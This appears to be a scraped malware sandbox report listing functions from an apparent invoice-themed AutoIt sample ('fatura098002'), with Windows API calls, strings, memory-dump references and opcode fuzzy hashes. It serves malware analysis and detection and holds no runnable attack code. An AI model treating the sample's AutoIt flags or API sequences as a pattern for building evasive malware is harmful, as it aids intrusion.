Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: dce16f70706a6135da34941cd71f3193ecc38f39be6728313d1f6945b4a7ce56
Instruction ID: 5f790ca760f7de6e83541f336fd71f8fb40f6a9560314ba4222201cc5882d724
Opcode Fuzzy Hash: dce16f70706a6135da34941cd71f3193ecc38f39be6728313d1f6945b4a7ce56
Instruction Fuzzy Hash: BE418F31204301DFD721DF26D845B6ABBE8AB85310F14861EFDA6973D1D738E905CB66

Function 00794416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0079CC08,00000000,?,?,?,?), ref: 007944AA
GetWindowLongW.USER32 ref: 007944C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007944D7

Strings

SysTreeView32, xrefs: 0079447C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: d69862c42d5e352b453bfd6e558d5870cbbd79edd3135ad2b9384a276de11222
Instruction ID: 66163adec5f6de781a20d3ea8c9ef4accb94100de98550cd01d21553feeff915
Opcode Fuzzy Hash: d69862c42d5e352b453bfd6e558d5870cbbd79edd3135ad2b9384a276de11222
Instruction Fuzzy Hash: C131DE31200205AFDF218E78EC45FEA7BA9EB08334F204319F979921E0D778EC629B50

Function 00766E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00766EED
VariantCopyInd.OLEAUT32(?,?), ref: 00766F08
VariantClear.OLEAUT32(?), ref: 00766F12

Strings

*jv, xrefs: 00766E8B, 00766E90, 00766EF8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jv
API String ID: 2173805711-3975105792
Opcode ID: dd6e226a1ef5316e45fe74caea179f12bd292da965113b276bd6e1c710efcab7
Instruction ID: c007abb9606d954757dbf04d006de9c68d5a179965a4423b35d81b5012ae2758
Opcode Fuzzy Hash: dd6e226a1ef5316e45fe74caea179f12bd292da965113b276bd6e1c710efcab7
Instruction Fuzzy Hash: F531AD72604245DBCB05AFA4E8959FE37B6FF84704B5005ADF8035B2A1CB3C9E12DB94

Function 0078304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0078335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00783077,?,?), ref: 00783378

inet_addr.WS2_32(?), ref: 0078307A
_wcslen.LIBCMT ref: 0078309B
htons.WS2_32(00000000), ref: 00783106

Strings

255.255.255.255, xrefs: 00783095, 0078309A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 39618ff03d6330c67fc756107dd1d5aa24ed0723f09942f489963db430aabdfe
Instruction ID: ca5902dabb93bbef5c9aadb32b522afa696ac481f7305db7e30219021f12eb07
Opcode Fuzzy Hash: 39618ff03d6330c67fc756107dd1d5aa24ed0723f09942f489963db430aabdfe
Instruction Fuzzy Hash: 7531D335604205DFCB10EF2CC489EAA77E1EF14B18F248159E9168B392DB7AEE42C760

Function 00794653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00794705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00794713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0079471A

Strings

msctls_updown32, xrefs: 00794684

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 962a41e7ee779602ba1793d54ef184bf4437bd7977a829c3308e00d7ab7619b7
Instruction ID: 89852a868122cce20c4dfa087977cf7be7cea369d4e984d1dc2e2c0ff46f0580
Opcode Fuzzy Hash: 962a41e7ee779602ba1793d54ef184bf4437bd7977a829c3308e00d7ab7619b7
Instruction Fuzzy Hash: DB214CB5600208AFDB11DF64EC95DBA37ADEB5A394B440059FA009B291DB38EC12CA60

Function 007695AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0076961D

Strings

#notrayicon, xrefs: 007695B7
#requireadmin, xrefs: 007695D9
#OnAutoItStartRegister, xrefs: 007695F3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 58be3e0163a52ca8634b62f5121ee617e9acedaa84102014c0c27bbdb8d89407
Instruction ID: 15679282cf958e4838065df58d405d0cd99c15d83d7718e47ab3d2f2dfb7bd8f
Opcode Fuzzy Hash: 58be3e0163a52ca8634b62f5121ee617e9acedaa84102014c0c27bbdb8d89407
Instruction Fuzzy Hash: 86212672604620A6C731AA24E806FB773DCDF51300F14402AFE5BA7082EB7DAD55C296

Function 007937B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00793840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00793850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00793876

Strings

Listbox, xrefs: 0079380F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 13750b056b4381fc35e6cdf939bfef9be3de92ee143b8c82a7a0e3798d1ea2aa
Instruction ID: 6b6cc2b80485cf5b1766d2bf89d5110f58a276b4a148a36b48db5830852545a6
Opcode Fuzzy Hash: 13750b056b4381fc35e6cdf939bfef9be3de92ee143b8c82a7a0e3798d1ea2aa
Instruction Fuzzy Hash: 8921A472610118BBEF21DF94DC85FBB376EEF89764F108115F9059B190C679DC5287A0

Function 007749F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00774A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00774A5C
SetErrorMode.KERNEL32(00000000,?,?,0079CC08), ref: 00774AD0

Strings

%lu, xrefs: 00774A6F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 0fd309ed6370693f6d8a6f063cb2c0a46833455b25652b724d4c81db0cf2b0ea
Instruction ID: 9dbaaa11ebdcb5e296f287f22318d4e1beda70bdee652d00254e4f92039479a0
Opcode Fuzzy Hash: 0fd309ed6370693f6d8a6f063cb2c0a46833455b25652b724d4c81db0cf2b0ea
Instruction Fuzzy Hash: 28313075A00109EFDB11DF64C885EAA7BF8EF04304F1580A9E909DB392D779ED46CB61

Function 007941EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0079424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00794264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00794271

Strings

msctls_trackbar32, xrefs: 00794226

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 7a3f003fcc96a9dd7ec00360211f4d9a14b82f6ce02d6c7c701a16354230d9e4
Instruction ID: 2d32b8d6ff0803a78acefa314915fc02f5f2f4f21ae945c3fea86ec44d0c43b4
Opcode Fuzzy Hash: 7a3f003fcc96a9dd7ec00360211f4d9a14b82f6ce02d6c7c701a16354230d9e4
Instruction Fuzzy Hash: E5110632240208BEEF209F29DC06FAB3BACFF85B64F110528FA55E2190D675DC529B20

Function 00762F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A

Part of subcall function 00762DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00762DC5
Part of subcall function 00762DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00762DD6
Part of subcall function 00762DA7: GetCurrentThreadId.KERNEL32 ref: 00762DDD
Part of subcall function 00762DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00762DE4

GetFocus.USER32 ref: 00762F78

Part of subcall function 00762DEE: GetParent.USER32(00000000), ref: 00762DF9

GetClassNameW.USER32(?,?,00000100), ref: 00762FC3
EnumChildWindows.USER32(?,0076303B), ref: 00762FEB

Strings

%s%d, xrefs: 00762FFF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 49c9ae8feaff690b16900ca7cb2912a28a3bd890942c63a59c22277da06a82c3
Instruction ID: 033e3dcbfa8d79805b5eeb6eec8c25ef5b31272ee93bf0057809c73746d30108
Opcode Fuzzy Hash: 49c9ae8feaff690b16900ca7cb2912a28a3bd890942c63a59c22277da06a82c3
Instruction Fuzzy Hash: 4B11C0B1300205EBDF556F60CC99EED37AAAF84304F148075FD0A9B292DE38994ACB70

Function 00795882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007958C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007958EE
DrawMenuBar.USER32(?), ref: 007958FD

Strings

0, xrefs: 0079588F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 2e102bfb3a73afe454bf87146140a3c08469909b76dbcdc07612298778f40dc8
Instruction ID: f816ed6f9a5a8b93635bf2c6aa51a2b784738b0c65450265c7b6ebb5af77bfa9
Opcode Fuzzy Hash: 2e102bfb3a73afe454bf87146140a3c08469909b76dbcdc07612298778f40dc8
Instruction Fuzzy Hash: CA018431500228EFDF129F15EC44BEEBBB4FF45760F108099E849D6151DB389A94DF21

Function 0076007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41a80a593d8bdf7ad1a414d7430bf2da412c8765f029589c51d35b8b3b99fcf
Instruction ID: 1abb453d1deb80e51408aa3baf7824a04de7999fe8461bf637e3d894525fef2a
Opcode Fuzzy Hash: a41a80a593d8bdf7ad1a414d7430bf2da412c8765f029589c51d35b8b3b99fcf
Instruction Fuzzy Hash: 3AC16D75A0020AEFDB14CFA8C898EAEB7B5FF48314F108598E906EB251D735ED41DB90

Function 0078342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00783459
CoUninitialize.COMBASE ref: 00783463
VariantInit.OLEAUT32(?), ref: 0078346E
VariantClear.OLEAUT32(?), ref: 0078371B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 127fdb1bebe2a32ace05cee656555761dba801d01a6bb49ab921798a10c18ecd
Instruction ID: 1af5f84049824ba4e961c970b3ed239d383f487a199b5d645cf60296faee67fa
Opcode Fuzzy Hash: 127fdb1bebe2a32ace05cee656555761dba801d01a6bb49ab921798a10c18ecd
Instruction Fuzzy Hash: 9EA14F75604301DFCB05EF28C889A6AB7E5FF88714F048959F9899B3A1DB38EE41CB51

Function 00760436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.COMBASE(?,00000000), ref: 007605F0
CoTaskMemFree.COMBASE(00000000), ref: 00760608
CLSIDFromProgID.COMBASE(?,?), ref: 0076062D
_memcmp.LIBVCRUNTIME ref: 0076064E

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 690c1278c4dcb98e20be65f210840ee25617efd941afc9645aeaca64067aadc1
Instruction ID: cecab9d085c0c9f4333dca2064260285842cf157e4d61385ca9ba3dea3e9b7ad
Opcode Fuzzy Hash: 690c1278c4dcb98e20be65f210840ee25617efd941afc9645aeaca64067aadc1
Instruction Fuzzy Hash: 32810C75A00109EFCF04DF94C988DEEB7B9FF89315F204558E906AB251DB75AE06CBA0

Function 00741391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007414C0

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7d8114ea3ea24648b7c5033381f3cd488cf0ad0a634de5b57dc242a99a1a9817
Instruction ID: ba9050f0a8a75d28ff0ba90dd2cdb4507bda0d600de6b55a534ea2843565d619
Opcode Fuzzy Hash: 7d8114ea3ea24648b7c5033381f3cd488cf0ad0a634de5b57dc242a99a1a9817
Instruction Fuzzy Hash: 10412C32A40154EBEB217BFDAC49ABE3AF4FF42370F544236F419D6192E77C88815661

Function 00796278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00FAED30,?), ref: 007962E2
ScreenToClient.USER32(?,?), ref: 00796315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00796382

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

